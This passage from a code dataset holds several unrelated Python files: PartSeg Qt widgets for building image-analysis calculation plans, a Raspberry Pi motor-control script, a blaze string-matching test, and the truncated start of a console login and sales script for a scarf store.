self.add_measurement_btn.clicked.connect(self._measurement_add)\n self.measurements_list.currentTextChanged.connect(self._measurement_selected)\n\n layout = QGridLayout()\n layout.setSpacing(0)\n layout.addWidget(self.measurements_list, 0, 0, 1, 2)\n lab = QLabel(\"Name prefix:\")\n lab.setToolTip(\"Prefix added before each column name\")\n layout.addWidget(lab, 1, 0)\n layout.addWidget(self.measurement_name_prefix, 1, 1)\n layout.addWidget(QLabel(\"Channel:\"), 2, 0)\n layout.addWidget(self.choose_channel_for_measurements, 2, 1)\n layout.addWidget(QLabel(\"Units:\"), 3, 0)\n layout.addWidget(self.units_choose, 3, 1)\n layout.addWidget(self.add_measurement_btn, 4, 0, 1, 2)\n self.setLayout(layout)\n\n self.add_measurement_btn.setDisabled(True)\n self._refresh_measurement()\n self.settings.measurement_profiles_changed.connect(self._refresh_measurement)\n\n def set_replace(self, replace: bool):\n super().set_replace(replace)\n self.add_measurement_btn.setText(\"Replace set of measurements\" if self._replace else \"Add set of measurements\")\n\n def _activate_button(self, _value=None):\n if self._replace:\n self.add_measurement_btn.setEnabled(\n self._node_type == NodeType.measurement and self.measurements_list.currentItem() is not None\n )\n else:\n self.add_measurement_btn.setEnabled(\n self._node_type == NodeType.segment and self.measurements_list.currentItem() is not None\n )\n\n def _refresh_measurement(self):\n new_measurements = sorted(self.settings.measurement_profiles.keys(), key=str.lower)\n with self.enable_protect():\n self.refresh_profiles(self.measurements_list, new_measurements)\n\n def _measurement_add(self):\n item = self.measurements_list.currentItem()\n if item is None:\n return\n measurement_copy = deepcopy(self.settings.measurement_profiles[item.text()])\n prefix = str(self.measurement_name_prefix.text()).strip()\n channel = self.choose_channel_for_measurements.currentIndex() - 1\n 
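# Note (added): index 0 is \"Same as segmentation\", so the -1 offset maps it to channel -1 and shifts the real channel choices to 0-based numbers.\n        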
measurement_copy.name_prefix = prefix\n self.set_of_measurement_add.emit(\n MeasurementCalculate(\n channel=channel,\n measurement_profile=measurement_copy,\n name_prefix=prefix,\n units=self.units_choose.currentEnum(),\n )\n )\n\n def _measurement_selected(self, name: str):\n if self.protect:\n return\n self._activate_button()\n self.set_of_measurement_selected.emit(self.settings.measurement_profiles[name])\n\n\nclass StretchWrap(QWidget):\n def __init__(self, widget: QWidget, parent: typing.Optional[QWidget] = None):\n super().__init__(parent)\n self.widget = widget\n lay = QVBoxLayout()\n lay.setSpacing(0)\n lay.addWidget(widget)\n lay.addStretch(1)\n self.setLayout(lay)\n\n def __getattr__(self, item):\n return getattr(self.widget, item)\n\n\nclass SelectMaskOp(ProtectedGroupBox):\n mask_step_add = Signal(object)\n\n def __init__(self, settings: PartSettings, parent: typing.Optional[QWidget] = None):\n super().__init__(\"Use mask from:\", parent)\n self.settings = settings\n self.mask_set = {}\n\n self.file_mask = FileMask()\n self.mask_from_segmentation = MaskWidget(settings)\n self.mask_operation = StretchWrap(QEnumComboBox(enum_class=MaskOperation))\n self.add_mask_btn = QPushButton(\"Add mask\")\n self.add_mask_btn.setToolTip(\"Mask need to have unique name\")\n self.add_mask_btn.clicked.connect(self._add_mask)\n self.mask_name = QLineEdit()\n\n self.mask_tab_select = QTabWidget()\n\n self.mask_tab_select.addTab(self.file_mask, \"File\")\n self.mask_tab_select.addTab(self.mask_from_segmentation, \"Current ROI\")\n self.mask_tab_select.addTab(self.mask_operation, \"Operations on masks\")\n self.mask_tab_select.setTabToolTip(2, \"Allows to create mask which is based on masks previously added to plan.\")\n self.mask_tab_select.currentChanged.connect(self._activate_button)\n self.mask_name.textChanged.connect(self._activate_button)\n\n layout = QGridLayout()\n layout.setSpacing(0)\n layout.addWidget(self.mask_tab_select, 0, 0, 1, 2)\n label = QLabel(\"Mask name:\")\n label.setToolTip(\"Needed if you would like to reuse this mask in tab 'Operations on masks'\")\n self.mask_name.setToolTip(\"Needed if you would like to reuse this mask in tab 'Operations on masks'\")\n layout.addWidget(label, 1, 0)\n layout.addWidget(self.mask_name, 1, 1)\n layout.addWidget(self.add_mask_btn, 2, 0, 1, 2)\n self.setLayout(layout)\n\n self.add_mask_btn.setDisabled(True)\n\n def update_mask_set(self, mask_set: typing.Set[str]):\n self.mask_set = mask_set\n\n def set_replace(self, replace: bool):\n super().set_replace(replace)\n self.add_mask_btn.setText(\"Replace mask\" if self._replace else \"Add mask\")\n\n def _activate_button(self, _value=None):\n name = self.mask_name.text().strip()\n name_ok = not name or name not in self.mask_set\n if self._replace:\n name_ok = name_ok and self._node_type == NodeType.mask\n node_type = self._parent_node_type\n else:\n node_type = self._node_type\n if self.mask_tab_select.currentWidget() == self.mask_from_segmentation:\n self.add_mask_btn.setEnabled(node_type == NodeType.segment and name_ok)\n return\n self.add_mask_btn.setEnabled(node_type == NodeType.root and name_ok)\n\n def _add_mask(self):\n widget = self.mask_tab_select.currentWidget()\n name = self.mask_name.text().strip()\n if widget == self.file_mask:\n mask_ob = self.file_mask.get_value(name)\n elif widget == self.mask_from_segmentation:\n mask_ob = MaskCreate(name=name, mask_property=self.mask_from_segmentation.get_mask_property())\n elif widget == self.mask_operation:\n dial = TwoMaskDialog(self.mask_set)\n 
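# Note (added): TwoMaskDialog keeps OK disabled until both fields name distinct, previously defined masks, so the names returned below are safe to combine.\n            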
if not dial.exec_():\n return # pragma: no cover\n names = dial.get_result()\n\n if self.mask_operation.currentEnum() == MaskOperation.mask_intersection: # Mask intersection\n mask_construct = MaskIntersection\n else:\n mask_construct = MaskSum\n mask_ob = mask_construct(name=name, mask1=names[0], mask2=names[1])\n else:\n raise ValueError(\"Unknown widget\") # pragma: no cover\n\n self.mask_step_add.emit(mask_ob)\n\n\nclass CreatePlan(QWidget):\n plan_node_changed = Signal()\n\n def __init__(self, settings: PartSettings):\n super().__init__()\n self.settings = settings\n self.save_translate_dict: typing.Dict[str, SaveBase] = {x.get_short_name(): x for x in save_dict.values()}\n self._mask_set = set()\n self.plan = PlanPreview(self)\n self.save_plan_btn = QPushButton(\"Save\")\n self.clean_plan_btn = QPushButton(\"Remove all\")\n self.remove_btn = QPushButton(\"Remove\")\n self.update_element_chk = QCheckBox(\"Update element\")\n self.other_operations = OtherOperations(self)\n self.roi_extraction = ROIExtractionOp(settings=settings, parent=self)\n self.select_measurement = SelectMeasurementOp(settings=settings, parent=self)\n self.select_mask = SelectMaskOp(settings=settings, parent=self)\n self.mask_set = set()\n\n self.expected_node_type = None\n self.save_constructor = None\n\n self.information = QTextEdit()\n self.information.setReadOnly(True)\n\n # FIXME: fix in better way\n self.calculation_plan = CalculationPlan()\n self.plan.set_plan(self.calculation_plan)\n self.segmentation_mask = MaskWidget(settings)\n self.file_mask = FileMask()\n\n self.other_operations.root_type_changed.connect(self.change_root_type)\n self.other_operations.save_operation.connect(self.add_save_operation)\n self.roi_extraction.roi_extraction_pipeline_selected.connect(self.show_info)\n self.roi_extraction.roi_extraction_profile_selected.connect(self.show_info)\n self.roi_extraction.roi_extraction_profile_add.connect(self.add_roi_extraction)\n self.roi_extraction.roi_extraction_pipeline_add.connect(self.add_roi_extraction_pipeline)\n self.select_measurement.set_of_measurement_add.connect(self.add_set_of_measurement)\n self.select_measurement.set_of_measurement_selected.connect(self.show_info)\n self.select_mask.mask_step_add.connect(self.create_mask)\n\n self.clean_plan_btn.clicked.connect(self.clean_plan)\n self.remove_btn.clicked.connect(self.remove_element)\n self.save_plan_btn.clicked.connect(self.add_calculation_plan)\n self.update_element_chk.stateChanged.connect(self.select_mask.set_replace)\n self.update_element_chk.stateChanged.connect(self.roi_extraction.set_replace)\n self.update_element_chk.stateChanged.connect(self.select_measurement.set_replace)\n\n self.setup_ui()\n\n self.node_type = NodeType.root\n self.node_name = \"\"\n self.plan.changed_node.connect(self.node_type_changed)\n self.node_type_changed()\n\n def setup_ui(self):\n plan_box = QGroupBox(\"Prepare workflow:\")\n lay = QVBoxLayout()\n lay.addWidget(self.plan)\n bt_lay = QGridLayout()\n bt_lay.setSpacing(1)\n bt_lay.addWidget(self.save_plan_btn, 0, 0)\n bt_lay.addWidget(self.clean_plan_btn, 0, 1)\n bt_lay.addWidget(self.remove_btn, 1, 0)\n bt_lay.addWidget(self.update_element_chk, 1, 1)\n lay.addLayout(bt_lay)\n plan_box.setLayout(lay)\n plan_box.setStyleSheet(group_sheet)\n\n info_box = QGroupBox(\"Information\")\n info_box.setStyleSheet(group_sheet)\n lay = QVBoxLayout()\n lay.addWidget(self.information)\n info_box.setLayout(lay)\n\n layout = QGridLayout()\n layout.addWidget(plan_box, 0, 0, 5, 1)\n layout.addWidget(self.select_mask, 
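# remaining addWidget args: row, column, rowSpan, columnSpan\n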
0, 2, 1, 2)\n layout.addWidget(self.other_operations, 0, 1)\n layout.addWidget(self.roi_extraction, 1, 1, 1, 2)\n layout.addWidget(self.select_measurement, 1, 3)\n layout.addWidget(info_box, 3, 1, 1, 3)\n self.setLayout(layout)\n\n @property\n def mask_set(self):\n return self._mask_set\n\n @mask_set.setter\n def mask_set(self, value):\n self._mask_set = value\n self.select_mask.update_mask_set(value)\n\n def change_root_type(self, root_type: RootType):\n self.calculation_plan.set_root_type(root_type)\n self.plan.update_view()\n\n def add_save_operation(self, save_info: Save):\n if self.update_element_chk.isChecked():\n self.calculation_plan.replace_step(save_info)\n else:\n self.calculation_plan.add_step(save_info)\n self.plan.update_view()\n\n def add_set_of_measurement(self, set_of_measurement: MeasurementCalculate):\n if self.update_element_chk.isChecked():\n self.calculation_plan.replace_step(set_of_measurement)\n else:\n self.calculation_plan.add_step(set_of_measurement)\n self.plan.update_view()\n\n def node_type_changed(self):\n self.node_name = \"\"\n if self.plan.currentItem() is None:\n self.remove_btn.setDisabled(True)\n self.plan_node_changed.emit()\n logging.debug(\"[node_type_changed] return\")\n return\n node_type = self.calculation_plan.get_node_type()\n\n node_type_for_ob = self.calculation_plan.get_node_type(parent=self.update_element_chk.isChecked())\n\n self.other_operations.set_current_node(node_type, node_type_for_ob)\n self.roi_extraction.set_current_node(node_type, node_type_for_ob)\n self.select_measurement.set_current_node(node_type, node_type_for_ob)\n self.select_mask.set_current_node(node_type, node_type_for_ob)\n\n self.node_type = node_type\n self.plan_node_changed.emit()\n\n def create_mask(self, mask_ob: MaskBase):\n if mask_ob.name and mask_ob.name in self.mask_set:\n show_warning(\"Already exists\", \"Mask with this name already exists\")\n return\n\n if self.update_element_chk.isChecked():\n node = self.calculation_plan.get_node()\n name = node.operation.name\n if name in self.calculation_plan.get_reused_mask() and name != mask_ob.name:\n show_warning(\n \"Cannot remove\", f\"Cannot remove mask '{name}' from plan because it is used in other elements\"\n )\n return\n\n self.mask_set.remove(name)\n self.mask_set.add(mask_ob.name)\n self.calculation_plan.replace_step(mask_ob)\n else:\n self.mask_set.add(mask_ob.name)\n self.calculation_plan.add_step(mask_ob)\n self.plan.update_view()\n\n def add_roi_extraction(self, roi_extraction: ROIExtractionOp):\n if self.update_element_chk.isChecked():\n self.calculation_plan.replace_step(roi_extraction)\n else:\n self.calculation_plan.add_step(roi_extraction)\n self.plan.update_view()\n\n def add_roi_extraction_pipeline(self, roi_extraction_pipeline: SegmentationPipeline):\n if self.update_element_chk.isChecked():\n show_warning(\"Cannot update pipeline\", \"Cannot update pipeline\")\n return\n pos = self.calculation_plan.current_pos[:]\n old_pos = pos[:]\n for el in roi_extraction_pipeline.mask_history:\n self.calculation_plan.add_step(el.segmentation)\n self.plan.update_view()\n node = self.calculation_plan.get_node(pos)\n pos.append(len(node.children) - 1)\n self.calculation_plan.set_position(pos)\n self.calculation_plan.add_step(MaskCreate(name=\"\", mask_property=el.mask_property))\n self.plan.update_view()\n pos.append(0)\n self.calculation_plan.set_position(pos)\n self.calculation_plan.add_step(roi_extraction_pipeline.segmentation)\n self.calculation_plan.set_position(old_pos)\n self.plan.update_view()\n\n def 
remove_element(self):\n conflict_mask, used_mask = self.calculation_plan.get_file_mask_names()\n if len(conflict_mask) > 0:\n logging.info(\"Mask in use\")\n show_warning(\"In use\", f'Masks {\", \".join(conflict_mask)} are used in other places')\n\n return\n self.mask_set -= used_mask\n self.calculation_plan.remove_step()\n self.plan.update_view()\n\n def clean_plan(self):\n self.calculation_plan = CalculationPlan()\n self.plan.set_plan(self.calculation_plan)\n self.node_type_changed()\n self.mask_set = set()\n\n def add_calculation_plan(self, text=None):\n if text is None or isinstance(text, bool):\n text, ok = QInputDialog.getText(self, \"Plan title\", \"Set plan title\")\n else:\n text, ok = QInputDialog.getText(\n self, \"Plan title\", f\"Set plan title. Previous ({text}) is already in use\", text=text\n )\n text = text.strip()\n if ok:\n if not text:\n QMessageBox.information(\n self, \"Name cannot be empty\", \"Name cannot be empty, Please set correct name\", QMessageBox.Ok\n )\n self.add_calculation_plan()\n return\n if text in self.settings.batch_plans:\n res = QMessageBox.information(\n self,\n \"Name already in use\",\n \"Name already in use. Would like to overwrite?\",\n QMessageBox.Yes | QMessageBox.No,\n )\n if res == QMessageBox.No:\n self.add_calculation_plan(text)\n return\n plan = copy(self.calculation_plan)\n plan.set_name(text)\n self.settings.batch_plans[text] = plan\n self.settings.dump()\n\n def show_info(self, item: typing.Union[ROIExtractionOp, SegmentationPipeline, MeasurementProfile]):\n if isinstance(item, (ROIExtractionOp, MeasurementProfile)):\n self.information.setText(str(item))\n else:\n self.information.setText(item.pretty_print(AnalysisAlgorithmSelection))\n\n def edit_plan(self):\n plan = self.sender().plan_to_edit # type: CalculationPlan\n self.calculation_plan = copy(plan)\n self.plan.set_plan(self.calculation_plan)\n self.mask_set.clear()\n self.calculation_plan.set_position([])\n self.mask_set.update(self.calculation_plan.get_mask_names())\n\n\nclass PlanPreview(QTreeWidget):\n \"\"\"\n :type calculation_plan: CalculationPlan\n \"\"\"\n\n changed_node = Signal()\n\n def __init__(self, parent=None, calculation_plan=None):\n super().__init__(parent)\n self.calculation_plan = calculation_plan\n self.header().close()\n self.itemSelectionChanged.connect(self.set_path)\n self.setContextMenuPolicy(Qt.CustomContextMenu)\n\n def restore_path(self, widget, path):\n \"\"\"\n :type widget: QTreeWidgetItem\n :type path: list[int]\n :param widget:\n :param path:\n :return:\n \"\"\"\n if widget is None:\n return list(reversed(path))\n parent = widget.parent()\n if parent is None:\n return list(reversed(path))\n index = parent.indexOfChild(widget)\n if str(parent.child(0).text(0)) == \"Description\":\n index -= 1\n if index == -1:\n return None\n path.append(index)\n return self.restore_path(parent, path)\n\n def set_path(self):\n current_item = self.currentItem() # type : QTreeWidgetItem\n if current_item is None:\n return\n self.calculation_plan.set_position(self.restore_path(current_item, []))\n self.changed_node.emit()\n\n def preview_object(self, calculation_plan):\n self.set_plan(calculation_plan)\n\n def set_plan(self, calculation_plan):\n self.calculation_plan = calculation_plan\n self.setCurrentItem(self.topLevelItem(0))\n self.update_view(True)\n\n def explore_tree(self, up_widget, node_plan, deep=True):\n \"\"\"\n :type up_widget: QTreeWidgetItem\n :type node_plan: CalculationTree\n :type deep: bool\n :param up_widget: List widget item\n :param node_plan: 
node from calculation plan\n :return:\n \"\"\"\n widget = QTreeWidgetItem(up_widget)\n widget.setText(0, CalculationPlan.get_el_name(node_plan.operation))\n self.setCurrentItem(widget)\n if isinstance(node_plan.operation, (MeasurementCalculate, ROIExtractionProfile)):\n widget.setData(0, Qt.UserRole, node_plan.operation)\n if isinstance(node_plan.operation, (MeasurementCalculate, ROIExtractionProfile, MaskCreate)):\n desc = QTreeWidgetItem(widget)\n desc.setText(0, \"Description\")\n if isinstance(node_plan.operation, ROIExtractionProfile):\n txt = node_plan.operation.pretty_print(AnalysisAlgorithmSelection)\n else:\n txt = str(node_plan.operation)\n for line in txt.split(\"\\n\")[1:]:\n QTreeWidgetItem(desc, [line])\n if deep:\n for el in node_plan.children:\n self.explore_tree(widget, el)\n up_widget.setExpanded(True)\n\n def get_node(self, path):\n \"\"\"\n :type path: list[int]\n :param path:\n :return: QTreeWidgetItem\n \"\"\"\n widget = self.topLevelItem(0) # type : QTreeWidgetItem\n for index in path:\n if str(widget.child(0).text(0)) == \"Description\":\n widget = widget.child(index + 1)\n else:\n widget = widget.child(index)\n return widget\n\n def update_view(self, reset=False):\n if reset:\n self.clear()\n root = QTreeWidgetItem(self)\n root.setText(0, f\"Root {self.calculation_plan.get_root_type()}\")\n self.setCurrentItem(root)\n for el in self.calculation_plan.execution_tree.children:\n self.explore_tree(root, el, True)\n return\n self.blockSignals(True)\n root = self.get_node([])\n root.setText(0, f\"Root {self.calculation_plan.get_root_type()}\")\n for path, el, op_type in self.calculation_plan.get_changes():\n if op_type == PlanChanges.add_node:\n node = self.get_node(path)\n self.explore_tree(node, el, False)\n elif op_type == PlanChanges.remove_node:\n node = self.get_node(path[:-1])\n index = path[-1]\n if str(node.child(0).text(0)) == \"Description\":\n index += 1\n node.removeChild(node.child(index))\n elif op_type == PlanChanges.replace_node:\n node = self.get_node(path)\n node.setText(0, CalculationPlan.get_el_name(el.operation))\n if isinstance(el.operation, (MeasurementCalculate, ROIExtractionProfile, MaskCreate)):\n child = node.child(0)\n child.takeChildren()\n if isinstance(el.operation, ROIExtractionProfile):\n txt = el.operation.pretty_print(AnalysisAlgorithmSelection)\n else:\n txt = str(el.operation)\n for line in txt.split(\"\\n\")[1:]:\n QTreeWidgetItem(child, [line])\n\n else:\n logging.error(\"Unknown operation %s\", op_type) # pragma: no cover\n self.blockSignals(False)\n self.set_path()\n self.changed_node.emit()\n\n\nclass CalculateInfo(QWidget):\n \"\"\"\n \"widget to show information about plans and allow to se plan details\n :type settings: Settings\n \"\"\"\n\n plan_to_edit_signal = Signal()\n\n def __init__(self, settings: PartSettings):\n super().__init__()\n self.settings = settings\n self.calculate_plans = SearchableListWidget(self)\n self.plan_view = PlanPreview(self)\n self.delete_plan_btn = QPushButton(\"Delete\")\n self.edit_plan_btn = QPushButton(\"Edit\")\n self.export_plans_btn = QPushButton(\"Export\")\n self.import_plans_btn = QPushButton(\"Import\")\n info_layout = QVBoxLayout()\n info_butt_layout = QGridLayout()\n info_butt_layout.setSpacing(1)\n info_butt_layout.addWidget(self.delete_plan_btn, 1, 1)\n info_butt_layout.addWidget(self.edit_plan_btn, 0, 1)\n info_butt_layout.addWidget(self.export_plans_btn, 1, 0)\n info_butt_layout.addWidget(self.import_plans_btn, 0, 0)\n info_layout.addLayout(info_butt_layout)\n info_chose_layout = 
QVBoxLayout()\n info_chose_layout.setSpacing(2)\n info_chose_layout.addWidget(QLabel(\"List of workflows:\"))\n info_chose_layout.addWidget(self.calculate_plans)\n info_chose_layout.addWidget(QLabel(\"Preview:\"))\n info_chose_layout.addWidget(self.plan_view)\n info_layout.addLayout(info_chose_layout)\n self.setLayout(info_layout)\n self.calculate_plans.addItems(sorted(self.settings.batch_plans.keys()))\n self.protect = False\n self.plan_to_edit = None\n\n self.plan_view.header().close()\n self.calculate_plans.currentTextChanged.connect(self.plan_preview)\n self.delete_plan_btn.clicked.connect(self.delete_plan)\n self.edit_plan_btn.clicked.connect(self.edit_plan)\n self.export_plans_btn.clicked.connect(self.export_plans)\n self.import_plans_btn.clicked.connect(self.import_plans)\n self.settings.batch_plans_changed.connect(self.update_plan_list)\n self.plan_view.customContextMenuRequested.connect(self._context_menu)\n\n def _context_menu(self, point):\n item = self.plan_view.itemAt(point)\n data = item.data(0, Qt.UserRole)\n if data is None:\n return\n\n menu = QMenu(self)\n if isinstance(data, ROIExtractionProfile):\n action = QAction(\"Save ROI extraction Profile\")\n action.triggered.connect(lambda _: self._save_roi_profile(data))\n elif isinstance(data, MeasurementCalculate):\n action = QAction(\"Save Measurement profile\")\n action.triggered.connect(lambda _: self._save_measurement_profile(data.measurement_profile))\n else:\n raise ValueError(f\"Not supported data type {type(data)} for {data}\")\n menu.addAction(action)\n menu.exec_(self.plan_view.mapToGlobal(point))\n\n def _save_roi_profile(self, data: ROIExtractionProfile):\n if data.name in self.settings.roi_profiles:\n text, ok = QInputDialog.getText(\n self, \"Name collision\", \"Profile with this name exists, please provide a new name.\", text=data.name\n )\n if not ok:\n return None\n return self._save_roi_profile(typing.cast(ROIExtractionProfile, data.copy(update={\"name\": text})))\n self.settings.roi_profiles[data.name] = data\n return None\n\n def _save_measurement_profile(self, data: MeasurementProfile):\n if data.name in self.settings.measurement_profiles:\n text, ok = QInputDialog.getText(\n self, \"Name collision\", \"Profile with this name exists, please provide a new name.\", text=data.name\n )\n if not ok:\n return None\n return self._save_measurement_profile(typing.cast(MeasurementProfile, data.copy(update={\"name\": text})))\n self.settings.measurement_profiles[data.name] = data\n return None\n\n def update_plan_list(self):\n new_plan_list = sorted(self.settings.batch_plans.keys())\n if self.calculate_plans.currentItem() is not None:\n text = str(self.calculate_plans.currentItem().text())\n try:\n index = new_plan_list.index(text)\n except ValueError:\n index = -1\n else:\n index = -1\n self.protect = True\n self.calculate_plans.clear()\n self.calculate_plans.addItems(new_plan_list)\n if index != -1:\n self.calculate_plans.setCurrentRow(index)\n self.protect = False\n\n def export_plans(self):\n choose = ExportDialog(self.settings.batch_plans, PlanPreview)\n if not choose.exec_():\n return\n dial = PSaveDialog(\n \"Calculation plans (*.json)\",\n caption=\"Export calculation plans\",\n settings=self.settings,\n path=\"io.batch_plan_directory\",\n )\n dial.selectFile(\"calculation_plans.json\")\n if dial.exec_():\n file_path = str(dial.selectedFiles()[0])\n data = {x: self.settings.batch_plans[x] for x in choose.get_export_list()}\n with open(file_path, \"w\", encoding=\"utf-8\") as ff:\n json.dump(data, ff, 
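# cls: the settings-provided encoder handles serializing the CalculationPlan values\n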
cls=self.settings.json_encoder_class, indent=2)\n\n def import_plans(self):\n dial = PLoadDialog(\n [LoadPlanJson, LoadPlanExcel],\n settings=self.settings,\n path=\"io.batch_plan_directory\",\n caption=\"Import calculation plans\",\n )\n if dial.exec_():\n res = dial.get_result()\n plans, err = res.load_class.load(res.load_location)\n if err:\n show_warning(\"Import error\", f\"error during importing, part of data were filtered. {err}\")\n choose = ImportDialog(plans, self.settings.batch_plans, PlanPreview, CalculationPlan)\n if choose.exec_():\n for original_name, final_name in choose.get_import_list():\n self.settings.batch_plans[final_name] = plans[original_name]\n\n def delete_plan(self):\n if self.calculate_plans.currentItem() is None:\n return\n text = str(self.calculate_plans.currentItem().text())\n if not text:\n return # pragma: no cover\n if text in self.settings.batch_plans:\n del self.settings.batch_plans[text]\n self.plan_view.clear()\n\n def edit_plan(self):\n if self.calculate_plans.currentItem() is None:\n return\n text = str(self.calculate_plans.currentItem().text())\n if not text:\n return # pragma: no cover\n if text in self.settings.batch_plans:\n self.plan_to_edit = self.settings.batch_plans[text]\n self.plan_to_edit_signal.emit()\n\n def plan_preview(self, text):\n if self.protect:\n return\n text = str(text)\n if not text.strip():\n return\n plan = self.settings.batch_plans[text]\n self.plan_view.set_plan(plan)\n\n\nclass CalculatePlaner(QSplitter):\n \"\"\"\n :type settings: Settings\n \"\"\"\n\n def __init__(self, settings, parent=None):\n super().__init__(parent)\n self.settings = settings\n self.info_widget = CalculateInfo(settings)\n self.addWidget(self.info_widget)\n self.create_plan = CreatePlan(settings)\n self.info_widget.plan_to_edit_signal.connect(self.create_plan.edit_plan)\n self.addWidget(self.create_plan)\n","sub_path":"package/PartSeg/_roi_analysis/prepare_plan_widget.py","file_name":"prepare_plan_widget.py","file_ext":"py","file_size_in_byte":48766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"380878076","text":"import config\nimport RPi.GPIO as GPIO\nfrom time import sleep\n\nGPIO.setmode(GPIO.BOARD)\n\nMotorE_A = config.Config.getValue(\"motorE_A\") #6\nMotorE_B = config.Config.getValue(\"motorE_B\") #13\nMotorE_E = config.Config.getValue(\"motorE_E\") #5\n\nMotorW_A = config.Config.getValue(\"motorW_A\") #20\nMotorW_B = config.Config.getValue(\"motorW_B\") #21\nMotorW_E = config.Config.getValue(\"motorW_E\") #16\n\nGPIO.setup(MotorE_A,GPIO.OUT)\nGPIO.setup(MotorE_B,GPIO.OUT)\nGPIO.setup(MotorE_E,GPIO.OUT)\n\nGPIO.setup(MotorW_A,GPIO.OUT)\nGPIO.setup(MotorW_B,GPIO.OUT)\nGPIO.setup(MotorW_E,GPIO.OUT)\n\n\ndef go_in_open_motor_e():\n GPIO.output(MotorE_A,GPIO.HIGH)\n GPIO.output(MotorE_B,GPIO.LOW)\n GPIO.output(MotorE_E,GPIO.HIGH)\n sleep(2)\n\ndef go_in_open_motor_w():\n GPIO.output(MotorW_A,GPIO.HIGH)\n GPIO.output(MotorW_B,GPIO.LOW)\n GPIO.output(MotorW_E,GPIO.HIGH)\n sleep(2)\n\ndef go_in_closed_motor_e():\n GPIO.output(MotorE_A,GPIO.LOW)\n GPIO.output(MotorE_B,GPIO.HIGH)\n GPIO.output(MotorE_E,GPIO.HIGH)\n sleep(2)\n\ndef go_in_closed_motor_w():\n GPIO.output(MotorW_A,GPIO.LOW)\n GPIO.output(MotorW_B,GPIO.HIGH)\n GPIO.output(MotorW_E,GPIO.HIGH)\n sleep(2)\n\ndef stop_motor_e():\n GPIO.output(MotorE_E,GPIO.LOW)\n\ndef stop_motor_w():\n 
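# Note (added): dropping the E line stops the west motor while the A/B direction pins keep their last state, mirroring stop_motor_e above.\n    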
GPIO.output(MotorW_E,GPIO.LOW)\n\nGPIO.cleanup()\n","sub_path":"motor_control.py","file_name":"motor_control.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"279254487","text":"import datashape\nimport pytest\nfrom datashape import dshape\n\nfrom blaze import symbol\n\n\n@pytest.mark.parametrize(\n 'ds',\n [\n 'var * {name: string}',\n 'var * {name: ?string}',\n 'var * string',\n 'var * ?string',\n 'string',\n ]\n)\ndef test_like(ds):\n t = symbol('t', ds)\n expr = getattr(t, 'name', t).like('Alice*')\n assert expr.pattern == 'Alice*'\n assert expr.schema.measure == dshape(\n '%sbool' % ('?' if '?' in ds else '')\n ).measure\n","sub_path":"lib/python2.7/site-packages/blaze/expr/tests/test_strings.py","file_name":"test_strings.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"7478005","text":"import sqlite3\r\nimport datetime\r\n\r\nnow = datetime.datetime.now()\r\n\r\nconn = sqlite3.connect('test.db')\r\n\r\ndef mainUI():\r\n print(\"--------------------------------------------------------------------------------------\")\r\n print(\"--------------------------------------------------------------------------------------\")\r\n print(\"--w w w eeeeee ll ccccccc ooooo m m eeeeee--\")\r\n print(\"-- w w w w ee ll ccccc oo oo m m m m ee --\")\r\n print(\"-- w w w w eeeeee ll ccc oo oo m m m m eeeeee--\")\r\n print(\"-- w w w w ee ll ccccc oo oo m m m m ee --\")\r\n print(\"-- w w eeeeee lllllll ccccccc ooooo m m m eeeeee--\")\r\n print(\"--------------------------------------------------------------------------------------\")\r\n print(\"-- sssss ccccccc aaa rrrrr fffffff --\")\r\n print(\"-- ss ccccc aa aa rr rr ff --\")\r\n print(\"-- ssssss ccc aa aa rrrrrr fffff --\")\r\n print(\"-- ss ccccc aaaaaaaaa rr rr ff --\")\r\n print(\"-- sssss ccccccc aa aa rr rr ff --\")\r\n print(\"--------------------------------------------------------------------------------------\")\r\n print(\"-- sssss tttttt ooooo rrrrr eeeeee --\")\r\n print(\"-- ss tt oo oo rr rr ee --\")\r\n print(\"-- ssssss tt oo oo rrrrrr eeeeee --\")\r\n print(\"-- ss tt oo oo rr rr ee --\")\r\n print(\"-- sssss tt ooooo rr rr eeeeee --\")\r\n print(\"--------------------------------------------------------------------------------------\")\r\n print(\"-- Connected and Ready To Go --\")\r\n print(\"--------------------------------------------------------------------------------------\")\r\n print(\"--------------------------------------------------------------------------------------\")\r\n\r\ndef closingUI():\r\n print(\"--------------------------------------------------------------------------------------\")\r\n print(\"--------------------------------------------------------------------------------------\")\r\n print(\"-- gggggg ooooo ooooo ddddd bbbb yy yy eeeeee --\")\r\n print(\"-- gg oo oo oo oo d d b b yy yy ee --\")\r\n print(\"-- gg ggg oo oo oo oo d d bbbbb yyyy eeeeee --\")\r\n print(\"-- gg gg oo oo oo oo d d b b yy ee --\")\r\n print(\"-- ggggggg ooooo ooooo ddddd bbbbbb yy eeeeee --\")\r\n print(\"--------------------------------------------------------------------------------------\")\r\n print(\"-- Disconnected, Bye Bye :D --\")\r\n print(\"--------------------------------------------------------------------------------------\")\r\n 
print(\"--------------------------------------------------------------------------------------\")\r\n\r\nn=0\r\n\r\ndef logIn(n):\r\n while (n!=1):\r\n holds = conn.execute(\"SELECT username, password,status from LOGIN\")\r\n print(\"\\nPlease login before continue\\n\")\r\n username = input(\"enter username : \")\r\n password = input(\"enter password : \")\r\n for row in holds:\r\n if (username == row[0] and password == row[1]):\r\n print(\"login successful\")\r\n name2=row[0]\r\n status=row[2]\r\n if(status.lower() == \"staff\"):\r\n anss=\"yes\"\r\n while(anss.lower() == \"yes\" or anss.lower() == \"y\"):\r\n selection3=int(input(\"1-Transaction 2-Add Member 3-Change Password : \"))\r\n if(selection3 == 1):\r\n ans=\"yes\"\r\n while(ans.lower() == \"yes\" or ans.lower() == \"y\"):\r\n calculatePrice(name2, status)\r\n ans=input(\"New Customer ? yes or no ? : \")\r\n elif(selection3 == 2):\r\n addMember()\r\n elif(selection3 == 3):\r\n updatePassword()\r\n anss = input(\"Next Customer ? yes or no ? : \")\r\n if(status.lower() == \"admin\"):\r\n ansss = \"yes\"\r\n while (ansss.lower() == \"yes\" or ansss.lower() == \"y\"):\r\n selection=int(input(\"Choose task 1-Approve Member 2-Add New Staff 3-View Staff 4-Remove Staff 5-Remove Member : \"))\r\n if (selection == 1):\r\n viewMember()\r\n selection2=input(\"Continue ? yes or no ?\")\r\n if(selection2.lower()==\"yes\" or selection2.lower()==\"y\"):\r\n rota=\"yes\"\r\n 